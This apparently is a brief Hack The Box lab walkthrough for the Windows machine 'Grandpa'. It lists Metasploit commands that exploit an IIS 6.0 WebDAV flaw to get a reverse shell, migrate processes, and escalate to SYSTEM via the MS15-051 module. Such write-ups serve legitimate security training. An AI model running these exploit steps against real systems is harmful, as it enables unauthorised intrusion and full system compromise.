Hackthebox - Grandpa
Windows

Nmap
As for granny this box has iis 6.0.
Let's run the nmap scan with the vuln script
Webdav
Let's use the same metasploit module we used in granny
use exploit/windows/iis/iis_webdav_scstoragepathfromurlset RHOSTS 10.10.10.14set LHOST tun0andrunWe get a shell let's migrate as getuid returns an access denied
pswe choose a process running asNT AUTHORITY\NETWORK SERVICEand then we usemigratewith pidmigrate 1608getuid now returns something to us
Privesc
Let's try local exploit suggester first
run multi/recon/local_exploit_suggesterAs for granny we do not get any result.
Let's check systeminfo and run wes on it
We get also a lot of results with wes
Let's try CVE-2014-4076 (MS14-070)
Here as well our shell dies
It does not seem to be vulnerable to CVE-2014-4113 according to wes
Let's try CVE-2015-1701 (MS15-051)
use exploit/windows/local/ms15_051_client_copy_imageset SESSION 3set LHOST tun0set LPORT 4445runWe get a system shell and we can grab the flags

Last updated